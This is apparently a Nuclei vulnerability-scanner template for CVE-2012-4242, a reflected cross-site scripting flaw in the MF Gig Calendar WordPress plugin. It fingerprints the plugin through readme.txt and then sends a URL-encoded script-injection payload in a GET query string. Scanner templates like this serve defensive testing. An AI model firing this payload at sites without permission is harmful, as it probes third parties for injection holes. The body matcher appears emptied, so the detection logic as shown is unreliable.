id: CVE-2012-4242 info: name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting author: daffainfo severity: medium description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Plugin MF Gig Calendar to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4242 - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 epss-percentile: 0.59564 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 2 vendor: "mf_gig_calendar_project" product: "mf_gig_calendar" tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project flow: http(1) && http(2) http: - raw: - | GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1 Host: {{Hostname}} matchers: - type: word internal: true words: - 'MF Gig Calendar =' - method: GET path: - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 4b0a00483046022100f322610921b216cee6caa7ac536c05dd12be0219e40dc2043b448b65fb87d2ac022100a5d43d8609bdbcb3d8d0a1c76313c928e074f2f05299cb8a52c1d0e6cedd3068:922c64590222798bb761d5b6d8e72950